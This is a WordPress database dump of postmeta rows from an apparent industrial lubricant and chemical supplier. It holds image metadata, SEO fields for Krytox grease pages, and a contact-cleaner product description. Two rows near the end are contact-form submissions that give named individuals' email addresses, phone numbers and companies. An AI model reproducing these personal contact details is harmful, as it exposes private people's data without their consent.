INSERT INTO `wp_postmeta` VALUES (27062, 3153, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1333;s:6:"height";i:1283;s:4:"file";s:15:"2016/11/xht.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:15:"xht-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:15:"xht-800x770.jpg";s:5:"width";i:800;s:6:"height";i:770;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:15:"xht-768x739.jpg";s:5:"width";i:768;s:6:"height";i:739;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:15:"xht-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:15:"xht-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:15:"xht-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:15:"xht-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27063, 3155, '_wp_attached_file', '2016/11/shutterstock_523282177.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27064, 3155, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:662;s:4:"file";s:34:"2016/11/shutterstock_523282177.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523282177-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_523282177-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_523282177-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523282177-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523282177-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_523282177-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_523282177-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:50;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27065, 3152, '_thumbnail_id', '3155'); 
INSERT INTO `wp_postmeta` VALUES (27067, 3152, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (27068, 3152, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (27069, 3152, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27070, 3152, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (27071, 3152, '_yoast_wpseo_focuskw_text_input', 'Krytox XHT'); 
INSERT INTO `wp_postmeta` VALUES (27072, 3152, '_yoast_wpseo_focuskw', 'Krytox XHT'); 
INSERT INTO `wp_postmeta` VALUES (27073, 3152, '_yoast_wpseo_title', 'Krytox XHT-BDZ Case Study - Steam Turbine Governor Control Valve'); 
INSERT INTO `wp_postmeta` VALUES (27074, 3152, '_yoast_wpseo_metadesc', 'Using Krytox XHT-BDZ grease, the utility was able to avoid frequent shutdowns, thus improving the reliability and enhancing the bottom line.'); 
INSERT INTO `wp_postmeta` VALUES (27075, 3152, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27076, 3152, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27077, 3152, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (27079, 3152, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (27080, 1292, '_wp_old_slug', 'contact-re-nu'); 
INSERT INTO `wp_postmeta` VALUES (27081, 1292, '_yoast_wpseo_focuskw_text_input', 'MS-530N Contact Re-Nu'); 
INSERT INTO `wp_postmeta` VALUES (27082, 1292, '_yoast_wpseo_focuskw', 'MS-530N Contact Re-Nu'); 
INSERT INTO `wp_postmeta` VALUES (27083, 1292, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (27084, 1292, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (27085, 1292, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (27086, 1292, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (27087, 1292, '_ywtm_content_tab_description', 'MS-532N Contact Re-Nu is acleaning agent that restores electrical or mechanical continuity on all types of contacts. Excellent for cleaning oxides, oil, grease and dust from  contacts, switches, relays, tuners, encoders, slide wires, rheostats, distribution panels and servomechanisms. Evaporates quickly and leaves no residue. Utilizes Miller-Stephenson\'s proprietary cleaning technology non-flammable, low odor solvent blend.\r\n<h4><strong>ADVANTAGES:</strong></h4>\r\n<ul>\r\n 	<li>High effective cleaning agent</li>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>100% Nonflammable; low odor</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>\r\nMS-532N Contact Re-Nu is an electrical contact cleaner that has a high cleaning efficiency Kb value, while maintaining complete compatibility with most plastics, metals and elastomers, and sensitive electronic components.\r\n<h3><strong> </strong><strong>PLASTIC COMPATIBILITY:</strong></h3>\r\n(Immersion: 15 minutes at Room Temperature)\r\n<table style="height: 104px;" width="532">\r\n<tbody>\r\n<tr>\r\n<td width="168">·         Acetal</td>\r\n<td width="168">·         Polyethylene</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         Polypropylene</td>\r\n<td width="168">·         Polyester, PBT, PET</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         PEK, PEEK</td>\r\n<td width="168">·         Epoxy-Phenolcs</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         Polyimides</td>\r\n<td width="168">·         Polyvinylchloride</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         PTFE</td>\r\n<td width="168">·         Liq. Crystal Polymer</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong> </strong><strong>NOTE:</strong><strong>  </strong>Acrylics, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\r\n<h3><strong>Elastomer Capability: </strong></h3>\r\n(Immersion: 15 mins at Room Temperature)\r\n<table style="height: 173px;" width="511">\r\n<tbody>\r\n<tr>\r\n<td width="168">·   Butyl Rubber</td>\r\n<td width="168">·    Natural Rubber</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Polysulfide</td>\r\n<td width="168">·    EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Buna S</td>\r\n<td width="168">·    Buna N</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Neoprene</td>\r\n<td width="168">·    Urethane</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Chlorosulfonated PE</td>\r\n<td width="168">·    Silicone</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Viton™</td>\r\n<td width="168"> Fluorosilicones</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong> </strong><strong>NOTE:</strong> Elastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\r\n\r\n&nbsp;\r\n<h3><strong>Metal Compatibility:</strong></h3>\r\n(Immersion: 2 weeks at 99°F/37°C)\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Iron</li>\r\n 	<li>Gold</li>\r\n</ul>\r\n<strong> </strong><strong>Note:</strong><strong>  </strong>Test for compatibility before use.\r\n\r\n<strong> </strong>'); 
INSERT INTO `wp_postmeta` VALUES (27088, 1292, '_yoast_wpseo_linkdex', '94'); 
INSERT INTO `wp_postmeta` VALUES (27094, 3160, '_edit_lock', '1481073467:2'); 
INSERT INTO `wp_postmeta` VALUES (27095, 3160, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (27096, 3161, '_wp_attached_file', '2016/11/krytox-xp-bearing-test.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27097, 3161, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1018;s:6:"height";i:488;s:4:"file";s:34:"2016/11/krytox-xp-bearing-test.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-xp-bearing-test-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-xp-bearing-test-800x383.jpg";s:5:"width";i:800;s:6:"height";i:383;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-xp-bearing-test-768x368.jpg";s:5:"width";i:768;s:6:"height";i:368;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-xp-bearing-test-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-xp-bearing-test-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-xp-bearing-test-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-xp-bearing-test-510x488.jpg";s:5:"width";i:510;s:6:"height";i:488;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27098, 3162, '_wp_attached_file', '2016/11/krytox-xp-scar-test.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27099, 3162, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1013;s:6:"height";i:469;s:4:"file";s:31:"2016/11/krytox-xp-scar-test.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"krytox-xp-scar-test-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"krytox-xp-scar-test-800x370.jpg";s:5:"width";i:800;s:6:"height";i:370;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"krytox-xp-scar-test-768x356.jpg";s:5:"width";i:768;s:6:"height";i:356;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"krytox-xp-scar-test-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"krytox-xp-scar-test-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"krytox-xp-scar-test-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"krytox-xp-scar-test-510x469.jpg";s:5:"width";i:510;s:6:"height";i:469;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27100, 3163, '_wp_attached_file', '2016/11/Krytox-XP-Comparison-Chart.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27101, 3163, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1388;s:6:"height";i:560;s:4:"file";s:38:"2016/11/Krytox-XP-Comparison-Chart.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Krytox-XP-Comparison-Chart-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"Krytox-XP-Comparison-Chart-800x323.jpg";s:5:"width";i:800;s:6:"height";i:323;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"Krytox-XP-Comparison-Chart-768x310.jpg";s:5:"width";i:768;s:6:"height";i:310;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Krytox-XP-Comparison-Chart-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Krytox-XP-Comparison-Chart-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Krytox-XP-Comparison-Chart-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"Krytox-XP-Comparison-Chart-510x560.jpg";s:5:"width";i:510;s:6:"height";i:560;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27102, 3164, '_wp_attached_file', '2016/11/krytox-xp-load-wear-index.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27103, 3164, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:682;s:6:"height";i:176;s:4:"file";s:37:"2016/11/krytox-xp-load-wear-index.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"krytox-xp-load-wear-index-340x176.jpg";s:5:"width";i:340;s:6:"height";i:176;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"krytox-xp-load-wear-index-250x176.jpg";s:5:"width";i:250;s:6:"height";i:176;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"krytox-xp-load-wear-index-200x176.jpg";s:5:"width";i:200;s:6:"height";i:176;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"krytox-xp-load-wear-index-225x176.jpg";s:5:"width";i:225;s:6:"height";i:176;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"krytox-xp-load-wear-index-510x176.jpg";s:5:"width";i:510;s:6:"height";i:176;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27104, 3165, '_wp_attached_file', '2016/11/krytox-xp-grease-test.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27105, 3165, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:672;s:6:"height";i:263;s:4:"file";s:33:"2016/11/krytox-xp-grease-test.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-xp-grease-test-340x263.jpg";s:5:"width";i:340;s:6:"height";i:263;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-xp-grease-test-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-xp-grease-test-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-xp-grease-test-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"krytox-xp-grease-test-510x263.jpg";s:5:"width";i:510;s:6:"height";i:263;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27106, 1292, '_wp_old_slug', 'ms-532n-contact-re-nu'); 
INSERT INTO `wp_postmeta` VALUES (27107, 3166, '_wp_attached_file', '2016/11/krytox-xp-final-corrosion-rating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27108, 3166, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:534;s:6:"height";i:182;s:4:"file";s:44:"2016/11/krytox-xp-final-corrosion-rating.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:44:"krytox-xp-final-corrosion-rating-340x182.jpg";s:5:"width";i:340;s:6:"height";i:182;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"krytox-xp-final-corrosion-rating-250x182.jpg";s:5:"width";i:250;s:6:"height";i:182;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"krytox-xp-final-corrosion-rating-200x182.jpg";s:5:"width";i:200;s:6:"height";i:182;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"krytox-xp-final-corrosion-rating-225x182.jpg";s:5:"width";i:225;s:6:"height";i:182;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:44:"krytox-xp-final-corrosion-rating-510x182.jpg";s:5:"width";i:510;s:6:"height";i:182;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27109, 3167, '_wp_attached_file', '2016/11/krytox-xp-plastic.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27110, 3167, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:536;s:6:"height";i:278;s:4:"file";s:29:"2016/11/krytox-xp-plastic.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-xp-plastic-340x278.jpg";s:5:"width";i:340;s:6:"height";i:278;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-xp-plastic-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-xp-plastic-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-xp-plastic-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-xp-plastic-510x278.jpg";s:5:"width";i:510;s:6:"height";i:278;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27111, 3168, '_wp_attached_file', '2016/11/shutterstock_523475344.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27112, 3168, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:992;s:4:"file";s:34:"2016/11/shutterstock_523475344.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523475344-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_523475344-800x794.jpg";s:5:"width";i:800;s:6:"height";i:794;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_523475344-768x762.jpg";s:5:"width";i:768;s:6:"height";i:762;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523475344-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523475344-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_523475344-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_523475344-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:75;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27113, 3169, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27114, 3169, '_seq_num', '137'); 
INSERT INTO `wp_postmeta` VALUES (27115, 3169, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27116, 3169, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27117, 3169, '_field_1', 'VINIT'); 
INSERT INTO `wp_postmeta` VALUES (27118, 3169, '_field_10', 'SRI NIKUNJ ENTERPRISES'); 
INSERT INTO `wp_postmeta` VALUES (27119, 3169, '_field_2', 'srinikunj@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (27120, 3169, '_field_8', '(924) 637-4683'); 
INSERT INTO `wp_postmeta` VALUES (27121, 3169, '_field_3', 'please quote for AURO DUSTER134AMS-222N, IN CAN OF 120 OZ FOR REMOVAL , QTY:- 4NOS REQUIRED.\r\n\r\nPLEASE INFORM WHETHER YOU HAVE DISTRIBUTOR IN INDIA FROM WHOM WE CAN BUY. IF NOT WE CAN BUY DIRECTLY FROM YOU \r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27122, 3169, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27123, 3169, '_sub_id', '3169'); 
INSERT INTO `wp_postmeta` VALUES (27124, 3160, '_thumbnail_id', '3168'); 
INSERT INTO `wp_postmeta` VALUES (27126, 3160, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (27127, 3160, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (27128, 3160, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27129, 3160, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (27130, 3160, '_yoast_wpseo_focuskw_text_input', 'Krytox XP'); 
INSERT INTO `wp_postmeta` VALUES (27131, 3160, '_yoast_wpseo_focuskw', 'Krytox XP'); 
INSERT INTO `wp_postmeta` VALUES (27132, 3160, '_yoast_wpseo_title', 'Krytox XP - Bearing Grease & Oil with Soluble Additives'); 
INSERT INTO `wp_postmeta` VALUES (27133, 3160, '_yoast_wpseo_metadesc', 'Krytox XP products are formulated using patented soluble additives. The soluble additive won’t be washed away or left behind with the grease thickener.'); 
INSERT INTO `wp_postmeta` VALUES (27134, 3160, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27135, 3160, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27136, 3160, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (27138, 3160, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (27143, 3174, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27144, 3174, '_seq_num', '156'); 
INSERT INTO `wp_postmeta` VALUES (27145, 3174, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27146, 3174, '_field_12', 'Perry Hanson'); 
INSERT INTO `wp_postmeta` VALUES (27147, 3174, '_field_13', 'Crane Aerospace and Electronics'); 
INSERT INTO `wp_postmeta` VALUES (27148, 3174, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27149, 3174, '_field_14', 'perry.hanson@craneae.com'); 
INSERT INTO `wp_postmeta` VALUES (27150, 3174, '_field_15', '(850) 217-6348'); 
INSERT INTO `wp_postmeta` VALUES (27151, 3174, '_field_16', 'Need updated SDS for MS-122RB Mold Release'); 
